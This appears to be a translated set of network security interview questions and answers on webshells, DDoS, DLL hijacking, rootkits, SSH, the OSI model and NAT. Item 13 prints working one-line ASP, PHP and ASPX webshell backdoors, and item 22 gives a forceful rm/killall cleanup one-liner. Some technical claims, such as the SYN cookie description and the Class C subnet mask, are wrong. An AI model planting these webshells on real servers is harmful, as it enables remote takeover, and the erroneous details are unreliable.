The following are the interview questions involved in various aspects of network security. The more stars, the greater the probability of problems appearing. I wish you all can find a satisfactory job.
Note: This set of interview questions has been compiled into a pdf document, but the content is still being updated, because it is impossible to cover all the interview questions anyway, and more people still hope to fill in the gaps by pointing to the surface.
I have organized the interview questions and written test questions into a pdf version for everyone to use. If you need it, you can promote it at the end of the article.
1. What is WebShell?
2. What is Phishing?
3. What are the ways for you to acquire network security knowledge?
4. What is a CC attack?
5. How to check after the web server has been hacked?
6. What is the meaning of the dll file and what is its use? DLL hijacking principle
7.0day vulnerability
8. What does Rootkit mean?
9. Honeypot
10.ssh
11.DDOS
12. Stuxnet virus:
13. One Word Trojan Horse
14. The role of HTTPS
15. Tips for manually finding backdoor Trojan horses
16. Describe the seven-layer structure of OSI (Basic Reference Model for Open Systems Interconnection)
17. The difference between TCP and UDP
18. Shelling
19. " Human flesh search "
20. The basic principle of SYN Flood
21. What is a mobile phone " jailbreak "
22. The host has been invaded, how would you deal with it? Self-examination solution:
23. NAT (Network Address Translation) Protocol
24. Intranet penetration
25. Virtual Private Network
26. Layer 2 switch
27. Routing technology
28. Layer 3 switch
29. IPv6 address representation
1. What is WebShell?
WebShell is exactly a kind of command execution environment that exists in the form of webpage files such as asp, php, jsp or cgi, and it can also be called a kind of webpage backdoor. After hackers invade a website, they usually mix these asp or php backdoor files with the normal webpage files in the web directory of the website server, and then they can use a browser to visit these asp or php backdoors and get a command Execute the environment to achieve the purpose of controlling the website server (you can upload and download files, view the database, execute arbitrary program commands, etc.). Commonly used WebShells in China include Haiyang ASP Trojan, Phpspy, c99shell, etc.
(Static web pages: The most commonly used format files are html format files. Most web pages are in html format, and html format includes .htm, dhtml.xhtml.shtm.shtml. These are static pages, which do not contain dynamic program.
Dynamic web pages include ASP (based on JavaScript or VbScript or C#), JSP, PHP, ASPX, jspx, and cgi. These include the code executed by the server, that is, before the server sends these web pages to the client, it will first execute the dynamic programming language inside, and send the html generated after execution to the client, so we are in the client The source code seen by the client is also in html format (because the dynamic code is directly executed on the server, and these server codes will not be displayed in the foreground.)
2. What is Phishing?
Phishing is an attack in which a mass of fraudulent spam is sent purporting to be from a bank or other reputable institution, with the intention of enticing recipients into giving sensitive information such as usernames, passwords, account IDs, ATM PINs or credit card details Way.
The most typical phishing attack lures the recipient to a carefully designed phishing website that is very similar to the target organization's website, and obtains sensitive personal information entered by the recipient on this website. Usually, this attack process will not let the victim vigilance.
It often directs users to enter personal data on fake websites whose URLs and interfaces look almost identical to the real website. Even with strong encrypted SSL server authentication, it is actually very difficult to detect whether a website is fake. Phishing is an instance of using social engineering techniques to fool users. It relies on the low affinity of current cybersecurity technology.
3. What are the ways for you to acquire network security knowledge?
1. Website, Kanxue, Security Focus, Dark Clouds in China, FreeBuf
2. Video learning: iChunqiu, 51cto, MOOC, Lab Building, Lab Bar, Netease Cloud Classroom, etc.
3. WeChat official account, Zhihu, etc., enterprise src, etc.
4. Books, "White Hats Talk about Web Security", "Authentic Guide to Web Application Security", etc.
5. Then it is to ask the good people
6. Finally, technology sharing within the company.
4. What is a CC attack?
I also know a little bit about this, knowing that it is a variant of DDos, normal requests are forged, and server resources are exhausted. Finally, let’s look at the answer from Wikipedia: CC attack is a type of DDOS (Distributed Denial of Service), compared to other DDOS attacks CC Seems to be more technical. You can't see the real source IP or unusually large traffic in this kind of attack, but it makes the server unable to connect normally. The principle of CC attack is that the attacker controls some hosts to send a large number of data packets to the other server continuously, causing the server resources to be exhausted until it crashes. CC is mainly used to attack webpages. Everyone has this experience: when a webpage is visited by a large number of people, it will be slow to open the webpage. CC is to simulate multiple users (as many threads as there are users) without stopping. Accessing pages that require a lot of data operations (that is, a lot of CPU time) causes a waste of server resources. The CPU is at 100% for a long time, and there will always be endless connections until the network is congested and normal access is suspended.
5. How to check after the web server has been hacked?
The easiest way is 1. Check the web server host, 2. Check if there are any abnormal ports open, 3. Use server security software such as Security Dog to clean.
6. What is the meaning of the dll file and what is its use?
DLL (Dynamic Link Library) files, that is, dynamic link libraries, are also called application extensions.
In the Windows application program, the modular design is implemented, which means that not every application program has written all the function codes, but calls the DLL of the corresponding function during the running process, and does not call the functions that do not need to be run, so It greatly speeds up the loading speed and efficiency of the program, and other applications can also call related DLLs, which is also conducive to promoting code reuse and memory usage efficiency, reducing resource occupation, and when the program is updated, it is only necessary to update the related DLL. .
It should be noted that some viruses will also disguise themselves as DLL files and replace the DLL files of the system, which requires us to guard against them.
DLL hijacking principle
Since the input table contains only the DLL name and not its pathname, the loader must search for the DLL file on disk. First, it will try to load the DLL from the directory where the current program is located. If it is not found, it will search in the Windows system directory, and finally it will search in each directory listed in the environment variable. Using this feature, first forge a system DLL with the same name, provide the same output table, and each output function turns to the real system DLL. When the program calls the system DLL, it will first call the forged DLL in the current directory, and after completing the relevant functions, it will jump to the function of the same name in the system DLL for execution. This process is described in a vivid word, that is, the system DLL has been hijacked (hijack).
After the fake dll is made, put it in the current directory of the program, so that when the original program calls the original function, it calls the function of the same name of the fake dll, enters the code of the hijacked DLL, and calls the function of the original DLL after processing.
How to Prevent DLL Hijacking
DLL hijacking uses the search path of unknown DLLs in the system to make the program load the system DLL with the same name in the current directory. So you can tell the location of the system DLL, change the order of loading the system DLL is not the current directory, but directly search in the system directory.
7.0day vulnerability
It is a vulnerability that has been discovered but has not yet been officially patched.
0-Day in the sense of information security refers to vulnerability information that is known and mastered before security patches are released.
8. What does Rootkit mean?
Rootkits are a special type of malware (malicious software). Rootkits are special because you don't know what they're doing. Rootkits are basically undetectable, and it's nearly impossible to remove them. While detection tools continue to proliferate, malware authors are constantly finding new ways to cover their tracks.
The purpose of a rootkit is to hide itself and other software from detection. It does this by preventing users from identifying and removing the attacker's software. Rootkits can hide almost any software, including file servers, keyloggers, botnets, and remailers. Many rootkits can even hide large collections of files and allow an attacker to keep many files on your computer without you being able to see them.
Rootkits themselves do not affect the operation of your computer like viruses or worms. An attacker can identify existing vulnerabilities on the target system. Vulnerabilities may include: open network ports, unpatched systems, or systems with weak administrator passwords. After gaining access to a vulnerable system, an attacker can manually install a rootkit. This type of sneaky attack usually doesn't trigger automatically enforced network security controls, such as intrusion detection systems.
Finding rootkits can be difficult. There are some software packages that can detect rootkits. These packages can be divided into two categories: signature-based checkers and behavior-based checkers. Signature (signature)-based checkers, such as most virus scanners, check binaries for known rootkits. Behavior-based checkers try to find rootkits by looking for some hidden elements that represent their main behaviors. A popular behavior-based rootkit checker is Rootkit Revealer.
After a rootkit is discovered in the system, the remedial measures that can be taken are also relatively limited. Because rootkits can hide themselves, you may not know how long they have been on your system. And you don't know what information a rootkit has already done damage to. The best response to a found rootkit is to wipe and reinstall the system. While this tactic is harsh, it's the only proven way to completely remove rootkits.
Preventing rootkits from entering your system is the best thing you can do. To accomplish this, use the same defense-in-depth strategy you use to protect against all malware that attacks your computer. Elements of defense in depth include: virus scanners, regular software updates, firewalls on hosts and networks, and strong password policies
9. Honeypot
A honeypot is like an intelligence gathering system. Honeypots appear to be intentional targets to entice hackers to attack. So after the attacker invades, you can know how he succeeded, and keep abreast of the latest attacks and vulnerabilities launched against the server. It is also possible to collect various tools used by hackers and master their social networks by eavesdropping on the connections between hackers.
10.ssh
SSH is the abbreviation of Secure Shell, developed by the Network Working Group of IETF; SSH is a security protocol based on the application layer. SSH is currently the most reliable protocol designed to provide security for remote login sessions and other network services. Using the SSH protocol can effectively prevent information leakage in the remote management process. SSH was originally a program on UNIX systems, and then quickly expanded to other operating platforms. SSH, when used correctly, closes holes in the network. SSH clients are available for a variety of platforms. Almost all UNIX platforms—including HP-UX, Linux, AIX, Solaris, Digital UNIX, Irix, and others—can run SSH.
Traditional network service programs, such as: ftp, pop and telnet are inherently insecure, because they transmit passwords and data in clear text on the network, and people with ulterior motives can easily intercept these passwords and data. Moreover, the security verification methods of these service programs also have their weaknesses, that is, they are easily attacked by the "man-in-the-middle" method. The so-called "man in the middle" attack method is that the "man in the middle" pretends to be a real server to receive the data you send to the server, and then pretends to be you to send the data to the real server. After the data transmission between the server and you is changed hands by the "middleman", serious problems will arise. By using SSH, you can encrypt all transmitted data, so that "man-in-the-middle" attacks are impossible, and it can also prevent DNS spoofing and IP spoofing. Using SSH, there is an additional benefit that the transmitted data is compressed, so the transmission speed can be accelerated. SSH has many functions. It can replace Telnet and provide a secure "channel" for FTP, PoP, and even PPP.
The English full name is Secure Shell. By using SSH, you can encrypt all transmitted data, so that "man-in-the-middle" attacks are impossible, and it can also prevent DNS and IP spoofing. An added benefit is that the transmitted data is compressed, so it can speed up the transmission. SSH has many functions. It can replace telnet and provide a safe "channel" for ftp, pop, and even ppp.
SSH is composed of client and server software, and there are two incompatible versions: 1.x and 2.x. The client program using SSH 2.x cannot connect to the service program of SSH 1.x. OpenSSH 2.x supports both SSH 1.x and 2.x. How SSH security verification works From the client's point of view, SSH provides two levels of security verification. The first level (password-based security verification) as long as you know your account number and password, you can log in to the remote host. All transmitted data will be encrypted, but there is no guarantee that the server you are connecting to is the server you intended to connect to. There may be other servers pretending to be real servers, that is, being attacked by "man in the middle". The second level (key-based security authentication) relies on keys, that is, you must create a pair of keys for yourself and put the public key on the server you need to access. If you want to connect to the SSH server, the client software will send a request to the server for security verification with your key. After the server receives the request, first look for your public key in your home directory on the server, and then compare it with the public key you sent. If the two keys match, the server encrypts the "challenge" with the public key and sends it to the client software. After the client software receives the "challenge", it can decrypt it with your private key and send it to the server. In this way, you must know the passphrase for your own key. However, in contrast to the first level, the second level does not require the transmission of passwords over the network. The second level not only encrypts all transmitted data, but "man-in-the-middle" attacks are also impossible (because he does not have your private key). But the whole login process may take 10 seconds.
SSL (Secure Sockets Layer (SSL) and Transport Layer Security (TLS)) is designed to strengthen the protocol of Web security transmission (HTTP/HTTPS/) (in fact, SMTP/NNTP, etc.), SSH (Secure Shell) more It is designed as a transfer protocol to strengthen Telnet/FTP security, and by default, it uses port 22.
Taking SSL as an example, basically the position of SSL in the transmission process is as follows:
---------
| HTTP |
---------
| SSL |
---------
| TCP |
---------
| IP |
---------
If the SSL protocol is used to access the webpage, the steps are as follows:
User: Enter https://www.sslserver.com in the address bar of the browser
HTTP layer: translate user needs into HTTP requests, such as
GET /index.htm HTTP/1.1
Host http://www.sslserver.com
SSL layer: securely negotiate an encryption key through the channel of the lower layer protocol, and use this key to encrypt HTTP requests.
TCP layer: establish a connection with port 443 of the web server, and transmit data processed by SSL.
The receiving end is the reverse of this process.
SSL establishes an encrypted channel on top of TCP, and the data passing through this layer is encrypted, thus achieving the effect of confidentiality.
The SSL protocol is divided into two parts: Handshake Protocol and Record Protocol. Among them, the Handshake Protocol is used to negotiate the key, and most of the content of the protocol is how the communicating parties use it to securely negotiate a key. Record Protocol defines the format of transmission.
11.DDOS
http://baike.baidu.com/link?url=hOeNhuaIj6tF9NY1wr2wbe9pIe52PaCJ5KXTisdfPUK4j8beTktmVsRaH5hRjkcpq6FPouzRl2hbsbpEDO5HRAUYi_D1Tsnu_q7in59xRasqHbmi1oYhEyVDVVn9ZcIcqRsZi5axo_HgkXBPioJx_#10
Distributed Denial of Service (DDoS: Distributed Denial of Service) attack refers to the use of client/server technology to combine multiple computers as an attack platform to launch DDoS attacks on one or more targets, thereby multiplying the probability of denial of service attacks. power. Usually, an attacker uses a stolen account to install a DDoS master program on a computer. At a set time, the master program will communicate with a large number of agents, which have been installed on many computers on the network. The agent launches an attack when instructed to do so. Using client/server technology, the master control program can activate hundreds of thousands of agent program runs in seconds.
12. Stuxnet virus:
It refers to a worm virus, which is the first "worm" virus that specifically targets the basic (energy) facilities in the real world, such as nuclear power plants, dams, and national power grids. As long as the computer operator inserts the virus-infected U disk into the USB interface, the virus will take control of some industrial computer systems without anyone noticing (without any other operation requirements or prompts appearing) .
Compared with traditional computer viruses, "Stuxnet" virus will not steal personal private information for profit. No internet connection is required to propagate. The virus can disrupt the core production-control computer software used by chemical, power generation and power transmission companies around the world, and instead "call the shots" on other computers in the plant. Very toxic and destructive. The "Stuxnet" code is very sophisticated and has two main functions. One is to make Iran's centrifuges run out of control. Misjudgment of decision.
13. One Word Trojan Horse
Asp one word Trojan horse:
<%execute(request("value"))%>
Php one sentence Trojan horse:
<?php @eval($_POST[value]);?>
Transformation: <?php $x=$_GET['z'];@eval(“$x;”);?>
Aspx one word Trojan horse:
<%@ Page Language="Jscript"%>
<%eval(Request.Item["value"])%>
14. The role of HTTPS
Content encryption establishes an information security channel to ensure the security of data transmission;
Authentication confirms the authenticity of the website
Data integrity prevents content from being impersonated or tampered with by a third party
The difference between HTTPS and HTTP
The https protocol needs to apply for a certificate from a CA.
http is a hypertext transfer protocol, and information is transmitted in plain text; https is a secure ssl encrypted transfer protocol.
http and https use completely different connection methods and different ports. The former is 80 and the latter is 443.
The http connection is very simple and stateless; the HTTPS protocol is a network protocol constructed by the SSL+HTTP protocol that can perform encrypted transmission and identity authentication, which is safer than the http protocol.
15. Tips for manually finding backdoor Trojan horses
1. First of all, the most important thing to pay attention to is the startup item of the system. You can check it in the startup list in the opened system configuration utility by entering "msconfig command" in "Run", and you should also pay attention to the service. Familiar children’s shoes are recommended to use the boot acceleration function of 360 Security Guard to check whether there are any abnormal start-up items and service items, because 99% of the backdoor Trojan horses will register themselves as system services to achieve the purpose of booting and self-starting. If suspicious item directly opens the corresponding path, finds the program file, deletes it directly and prohibits self-starting;
2. Check the system key directory system32 and the files under the system installation directory Windows. The default paths of the two under the xp system are C:\WINDOWS\system32 and C:\WINDOWS\ respectively. Then there are no suspicious executable files or dll files in the newly modified files. These two places are the favorite hiding places of Trojan horses (small tip: be sure to set the folder to display all files).
3. Observe whether there is any abnormality in the network connection, and "Run" - "cmd" - "netstat -an" to check whether there are any suspicious or abnormal network connections. If you are not very familiar with computers, it is recommended that you use the traffic monitoring function of 360 It is more intuitive and convenient. Pay special attention to the remote connection port. If there is a port similar to 8000, you should pay attention. 8000 is the default port of Gray Pigeon. I remember that I found port 8000 in the network connection during the backdoor Trojan horse test. Of course, it does not mean that as long as there is no network connection on port 8000, it must be safe, because port 8000 is only the default port for Gray Pigeon to go online, and the port can be changed.
Through the above methods, you can find some suspicious files on the computer. If you are sure, you can manually delete them. Of course, you can also use the power of anti-virus software. If you really hit the Trojan horse backdoor, don't panic. The best and most thorough method is to use the antivirus software of the latest virus database to scan and kill in safe mode after reinstalling the system.
16. Describe the seven-layer structure of OSI (Basic Reference Model for Open Systems Interconnection)
The advantage of layering is that the information exchange problem of an open system can be decomposed into a series of easy-to-control software and hardware modules-layers by using the layered structure, and each layer can be independently modified or expanded according to needs. The interconnection of manufacturers' equipment is also conducive to everyone's learning and understanding of data communication networks.
Different layers in the OSI reference model perform different functions, and each layer cooperates with each other to communicate through standard interfaces.
Layer 7 Application Layer: The highest layer in OSI. Provides access to the OSI environment for certain types of network applications. The application layer determines the nature of the communication between processes to meet the needs of the user. The application layer not only provides the information exchange and remote operation required by the application process, but also serves as the user agent of the application process to complete some functions necessary for information exchange. It includes: file transmission access and management FTAM, virtual terminal VT, transaction processing TP, remote database access RDA, manufacturing message specification MMS, directory service DS and other protocols; the application layer can communicate with the application interface to achieve the display to the user Purpose. Common protocols here are: HTTP, HTTPS, FTP, TELNET, SSH, SMTP, POP3, etc.
Layer 6 presentation layer: mainly used to deal with the representation of information exchanged in two communication systems. Solve the grammar problem of user information for upper-level users. It includes data format exchange, data encryption and decryption, data compression and terminal type conversion.
Layer 5 Session Layer: Establishes a peer connection between two nodes. Provides a dialogue control mechanism between applications in the end system. This service includes setting whether to establish a connection in full-duplex or half-duplex mode, although duplex mode can be handled in layer 4; the session layer manages the login and logout process. It specifically manages the conversation between two users and processes. If only one user is allowed to perform a specific operation at a time, the session layer protocol will manage these operations, such as preventing two users from updating the same set of data in the database at the same time.
Layer 4 Transport Layer: - General Data Delivery - Connection Oriented or Connectionless. Provide an end-to-end reliable, transparent and optimized data transmission service mechanism for session layer users. Includes full-duplex or half-duplex, flow control, and error recovery services; the transport layer divides messages into packets and reassembles them at the receiving end. Different packets can be sent to the host through different connections. In this way, higher bandwidth can be obtained without affecting the session layer. When establishing a connection, the transport layer can request the quality of service, which specifies acceptable bit error rate, delay, security and other parameters, and can also implement end-to-end flow control functions.
Layer 3 network layer: This layer establishes the connection between two nodes through addressing, selects the appropriate routing and switching nodes for the packets sent by the transport layer at the source, and transmits them to the transport layer at the destination correctly according to the address . It includes routing and relaying data through the interconnection network; in addition to selecting routes, the network layer is also responsible for establishing and maintaining connections, controlling congestion on the network, and generating billing information when necessary.
Layer 2 Data Link Layer: Data is framed at this layer and flow control is handled. Shield the physical layer, provide a data link connection for the network layer, and perform almost error-free data transmission (error control) on a physical connection that may have errors. This layer specifies the topology and provides hardware addressing. Commonly used devices include network cards, bridges, and switches;
Layer 1 physical layer: at the bottom of the OSI reference model. The main function of the physical layer is to use the physical transmission medium to provide a physical connection for the data link layer in order to transmit the bit stream transparently. Commonly used devices are (various physical devices) hubs, repeaters, modems, network cables, twisted pair cables, and coaxial cables.
When data is sent, it is passed from the seventh layer to the first layer, and the reverse is true for receiving data.
The upper three layers are collectively called the application layer and are used to control the software aspect. The next four layers are collectively referred to as the data flow layer and are used to manage the hardware. All layers except the physical layer are implemented in software.
Data will be split when sent to the data stream layer.
The data at the transport layer is called a segment, the network layer is called a packet, the data link layer is called a frame, and the physical layer is called a bit stream. This is called a PDU (protocol data unit) [2]
Functions of each layer
(1) Physical Layer (Physical Layer)
The physical layer is the lowest layer of the OSI reference model, which uses the transmission medium to provide a physical connection for the data link layer. It is primarily concerned with transmitting bit streams from one node to another over a physical link, which may be copper wire, satellite, microwave, or some other communication medium. The questions it cares about are: How many volts represent 1? How many volts represent 0? What is the clock rate? Full-duplex or half-duplex transmission? In general the physical layer is concerned with the mechanical, electrical, functional and procedural characteristics of the link.
(2) Data Link Layer (Data Link Layer)
The data link layer provides services for the network layer and solves the communication problem between two adjacent nodes. The transmitted protocol data unit is called a data frame.
The data frame contains information such as physical address (also known as MAC address), control code, data and check code. The main function of this layer is to convert unreliable physical links into error-free data links for the network layer by means of verification, confirmation, and feedback retransmission.
In addition, the data link layer also coordinates the data transmission rate of the sending and receiving parties, that is, performs flow control to prevent the receiver from overflowing the buffer and blocking the line due to the lack of time to process the high-speed data from the sender.
(3) Network Layer (Network Layer)
The network layer provides services for the transport layer, and the transmitted protocol data units are called data packets or packets. The main function of this layer is to solve the problem of how to transmit data packets through each node, that is, to send data packets to the destination through path selection algorithm (routing). In addition, in order to avoid network congestion caused by excessive data packets in the communication subnet, it is necessary to control the number of incoming data packets (congestion control). When data packets have to cross multiple communication subnets to reach their destination, the problem of Internet interconnection must also be solved.
(4) Transport Layer (Transport Layer)
The role of the transport layer is to provide end-to-end reliable and transparent data transmission services for upper layer protocols, including dealing with issues such as error control and flow control. This layer shields the details of the data communication of the lower layer from the upper layer, so that the upper layer users only see a reliable data path from host to host between two transmission entities, which can be controlled and set by the user.
The protocol data units transmitted by the transport layer are called segments or packets.
(5) Session Layer (Session Layer)
The main function of the session layer is to manage and coordinate the communication (dialogue) between various processes on different hosts, that is, it is responsible for establishing, managing and terminating sessions between applications. The session layer gets its name because it is very similar to the concept of a session between two entities. For example, an interactive user session begins with logging on to a computer and ends with logging off.
(6) Presentation Layer
The presentation layer deals with the representation of the data encoding flowing through the nodes, so as to ensure that the information sent by the application layer of one system can be read by the application layer of another system. If necessary, this layer can provide a standard representation for converting various data representation formats inside the computer into the standard representation used in network communication. Data compression and encryption are also among the transformation functions that the presentation layer can provide.
(7) Application Layer
The application layer is the highest layer of the OSI reference model and is the interface between the user and the network. This layer completes the application requirements of network users through application programs, such as file transfer, sending and receiving e-mail, and so on.
17. The difference between TCP and UDP
Summary of the difference between the characteristics of the TCP protocol and the UDP protocol:
1. The TCP protocol must label the segment when transmitting the data segment; the UDP protocol does not
2. The TCP protocol is reliable; the UDP protocol is not reliable
3. The TCP protocol is connection-oriented; the UDP protocol uses connectionless
4. The load of the TCP protocol is high, and virtual circuits are used; UDP uses connectionless
5. The sender of the TCP protocol needs to confirm whether the receiver has received the data segment (3-way handshake protocol)
6. The TCP protocol uses window technology and flow control
When the performance of data transmission must give way to the integrity, controllability and reliability of data transmission, the TCP protocol is the natural choice. When emphasizing transmission performance rather than transmission integrity, such as: audio and multimedia applications, UDP is the best choice. UDP is also a good choice when the data transmission time is so short that the previous connection process becomes the main body of the entire traffic, such as DNS exchange. Part of the reason for basing SNMP on UDP is that the designers thought that UDP's lower overhead would give it a better chance of delivering management data when network congestion occurs. The rich functions of TCP sometimes lead to unpredictable low performance, but we believe that in the near future, TCP's reliable point-to-point connections will be used in most network applications.
18. Shelling
From a technical point of view, a shell is a piece of code that is executed before the original program. The code of the original program may be compressed and encrypted during the packing process. . . . When the packed file is executed, the shell-this code runs before the original program, it restores the compressed and encrypted code to the original program code, and then returns the execution right to the original code. The shells of the software are divided into encryption shells, compression shells, camouflage shells, multi-layer shells, etc. The purpose is to hide the real OEP (entry point) of the program and prevent it from being cracked.
"Packing" refers to the protection of compiled EXE, DLL and other files by packing; "unpacking" refers to removing the shell outside the file and restoring the state of the file before it is packed. The shell comes from the program author For the purpose of program resource compression and registration protection, the shells are divided into three types: compressed shells, password shells, and encrypted shells. As the name implies, the compressed shells are only used to compress resources to reduce the program size. Common compressed shells include FSG, ASPack, UPX, Beidou, etc.; encrypted shells are often called protective shells and fierce shells, which encrypt and protect program input tables and other contents, and have good protection effects. Common encrypted shells include ASPROTECT, ACPROTECT, PELock, Phantom, etc.; passwords The shell is not used much at ordinary times, and the program of the encrypted shell can only be run after the correct password is entered
19. "Human flesh search"
It is an analogy term, mainly used to distinguish traditional search engines. It mainly refers to a way to search for information and resources by concentrating the power of many netizens. It includes the use of Internet machine search engines (such as Baidu, etc.) and the use of information that netizens can master in their daily lives to collect information. A way of [1].
20. The basic principle of SYN Flood
SYN Flood is currently one of the most popular methods of DoS (denial of service attack) and DDoS (distributed denial of service attack). Exhaustion (full CPU or insufficient memory) attack. To understand the basic principle of this attack, we still need to start with the process of establishing a TCP connection:
As we all know, TCP is different from UDP, it is connection-based, that is to say: in order to transmit TCP data between the server and the client, a virtual circuit must be established first, that is, a TCP connection, the standard process of establishing a TCP connection Is such that:
First, the requester (client) sends a TCP message containing the SYN flag. SYN is Synchronize. The synchronization message will indicate the port used by the client and the initial sequence number of the TCP connection;
In the second step, after receiving the SYN message from the client, the server will return a SYN+ACK message, indicating that the client's request is accepted, and at the same time the TCP sequence number is increased by one, and ACK is the confirmation (Acknowledgment).
In the third step, the client also returns an acknowledgment message ACK to the server, and the TCP sequence number is also increased by one, and a TCP connection is completed at this point.
The above connection process is called three-way handshake (Three-way Handshake) in the TCP protocol. The problem lies in the three-way handshake of the TCP connection. Suppose a user suddenly crashes or drops offline after sending a SYN message to the server, then the server cannot receive the client's ACK message after sending the SYN+ACK response message ( The third handshake cannot be completed), in this case, the server will generally retry (send SYN+ACK to the client again) and discard the unfinished connection after waiting for a period of time. The length of this period of time is called SYN Timeout Generally speaking, this time is on the order of minutes (about 30 seconds to 2 minutes); it is not a big problem that a thread of the server waits for 1 minute due to a user exception, but if there is a large number of malicious attackers simulating In this case, the server will consume a lot of resources in order to maintain a very large semi-connection list - tens of thousands of semi-connections, even simple saving and traversal will consume a lot of CPU time and memory, not to mention the continuous retrying of SYN+ACK on the IPs in this list. In fact, if the server's TCP/IP stack is not strong enough, the final result is often a stack overflow crash --- even if the server-side system is strong enough, the server-side will be busy processing the attacker's forged TCP connection request and have no time to pay attention to the client's normal request (After all, the client's normal request ratio is very small), at this time, from the perspective of normal clients, the server loses its response. We call this situation: the server is under SYN Flood attack (SYN flood attack).
From a defensive point of view, there are several simple solutions. The first is to shorten the SYN Timeout time. Since the effect of a SYN Flood attack depends on the number of SYN semi-connections maintained on the server, this value = the frequency of SYN attacks x SYN Timeout, so by shortening the time from receiving the SYN message to determining that the message is invalid and discarding the connection, for example, setting it to less than 20 seconds (too low SYN Timeout setting may affect the normal access of customers), it can be doubled Reduce server load.
The second method is to set a SYN cookie, which is to assign a cookie to each IP address that requests a connection. If you receive repeated SYN messages from a certain IP within a short period of time, it is considered to be under attack. packets will be discarded.
However, the above two methods can only deal with relatively primitive SYN Flood attacks. Shortening the SYN Timeout time only takes effect when the attack frequency of the other party is not high. SYN Cookie is more dependent on the real IP address used by the other party. 10,000/second speed to send SYN message, while using SOCK_RAW to randomly rewrite the source address in the IP message, the above method will be useless.
21. What is a mobile phone "jailbreak"
The so-called jailbreaking of the iOS system is the act of obtaining the highest authority of the system. The iOS system itself will not undergo qualitative changes before and after the jailbreak, but the iOS system can be fully utilized after the jailbreak.
Benefits of jailbreaking:
1. After jailbreaking, the operability is stronger. After obtaining the highest authority of the mobile phone, you can modify the content of the mobile phone, including installing free cracking software, custom functions, beautification, etc.
2. After jailbreaking, you can bypass the AppStore and download the APP for free.
Disadvantages of jailbreaking:
1. Warranty will be lost after jailbreaking.
2. After jailbreaking, the running of background programs and desktop themes will consume more power.
3. Jailbreaking is to break the closure of the iOS system, so the mobile phone becomes relatively unsafe.
22. The host has been invaded, how would you deal with it? Self-examination solution:
1. Check for viruses and Trojan horses.
1.1. Use netstat to check the network connection, analyze whether there is any suspicious sending behavior, and stop if there is any. (Linux common Trojans, clean up the command chattr -i /usr/bin/.sshd; rm -f /usr/bin/.sshd; chattr -i /usr/bin/.swhd; rm -f /usr/bin/.sshd ; rm -f -r /usr/bin/bsd-port; cp /usr/bin/dpkgd/ps /bin/ps; cp /usr/bin/dpkgd/netstat /bin/netstat; cp /usr/bin/dpkgd /lsof /usr/sbin/lsof; cp /usr/bin/dpkgd/ss /usr/sbin/ss;rm -r -f /root/.ssh; rm -r -f /usr/bin/bsd-port; find /proc/ -name exe | xargs ls -l | grep -v task |grep deleted| awk '{print $11}' | awk -F/ '{print $NF}' | xargs killall -9 ;)
1.2. Use antivirus software to scan and kill viruses.
2. Check and fix server vulnerabilities
2.1. Check whether the server account is abnormal, and if so, stop deleting it.
2.2. Check whether the server has logged in from another place, and if so, change the password to a strong password (words + numbers + special symbols) in upper and lower case, with 10 characters or more.
2.3. Check the background passwords of Jenkins, Tomcat, PhpMyadmin, WDCP, and Weblogic, and increase the password strength (words + numbers + special symbols) in upper and lower case, 10 characters or more.
2.4. Check whether there are any loopholes in the WEB application, such as struts, ElasticSearch, etc., and if so, please upgrade.
2.5. Check MySQL, SQLServer, FTP, WEB management background and other places where passwords are set, and increase the password strength (words + numbers + special symbols) uppercase and lowercase, 10 characters or more.
2.6. View the vulnerability that Redis can remotely write files without a password, check the SSH login key file created by hackers under /root/.ssh/, delete it, modify Redis to have password access and use a strong password, and do not need public network access Ok bind 127.0.0.1 for local access.
2.7. If any third-party software is installed, please follow the instructions on the official website to repair it.
3. Enable the cloud shield service, and enable all cloud shield security protection functions to protect your host from malicious attacks again.
Implement a security defense plan
Please start the cloud shield service as soon as possible. For details, please refer to: http://help.aliyun.com/view/11108300_13730770.html
At the same time, it is also recommended that you enable the cloud shield application firewall function. For details on how to enable it, see:
4. If the problem is still not resolved
After the above treatment, the problem still cannot be solved. It is strongly recommended that you download and back up the data of the system disk and data disk to the local storage, and then reset the entire disk (login to www.aliyun.com, enter My Aliyun-"Management Console-" Cloud Server ECS Console-"Click to perform the instance you need to initialize, close the instance after backing up the server data, click "Reset Disk", select the system disk and data disk according to your actual situation to reset), and restart Deploy the program application and upload the data after sanitizing the virus, and perform the aforementioned 3-step process again.
Intranet URL
23. NAT (Network Address Translation) Protocol
Computers on the intranet use the NAT (Network Address Translation) protocol to access the Internet through a public gateway. Computers on the intranet can send connection requests to other computers on the Internet, but other computers on the Internet cannot send connection requests to computers on the intranet.
NAT (Network Address Translator) is a network address translation, which realizes the mutual conversion between the IP address of the internal network and the address of the public network, and converts a large number of internal network IP addresses into one or a small number of public network IP addresses, reducing the need for public Network IP address occupation. The most typical application of NAT is: in a local area network, only one computer needs to be connected to the Internet, and NAT can be used to share the Internet connection, so that other computers in the local area network can also access the Internet. Using the NAT protocol, computers on the LAN can access computers on the Internet, but computers on the Internet cannot access computers on the LAN.
Class A 10.0.0.0--10.255.255.255
Class B 172.16.0.0--172.31.255.255
Class C 192.168.0.0--192.168.255.255
Intranet Reserved AddressEdit
Internet designers reserve a part of the IPv4 address space for private addresses. The IPv4 addresses in the private address space are called private addresses. These addresses will never be allocated as public addresses, so private addresses will never be duplicated with public addresses. .
IPv4-only addresses are as follows:
IP level IP location
Class A 10.0.0.0-10.255.255.255
Default subnet mask: 255.0.0.0
Class B 172.16.0.0-172.31.255.255
Default subnet mask: 255.240.0.0
Class C 192.168.0.0-192.168.255.255
Default subnet mask: 255.255.0.0
The intranet can access the Internet. The intranet needs a server or router as a gateway through which to access the Internet
The gateway server has an IP address of the gateway (server/router), and the IP of other intranet computers can be set according to it, provided that the first three numbers of the IP must be the same as it, and the fourth number can be from 0-255 Optional but different from the IP of the server
24. Intranet penetration
That is, NAT penetration, port mapping is used to allow computers on the external network to find computers on the internal network, and it can also achieve web internal network penetration based on HTTP/2.
25. Virtual Private Network
The function is: establish a private network on the public network, and carry out encrypted communication. It is widely used in enterprise network. The VPN gateway realizes remote access by encrypting the data packet and converting the destination address of the data packet. For example, if an employee of a company goes on a business trip and wants to access server resources on the intranet, this type of access is remote access.
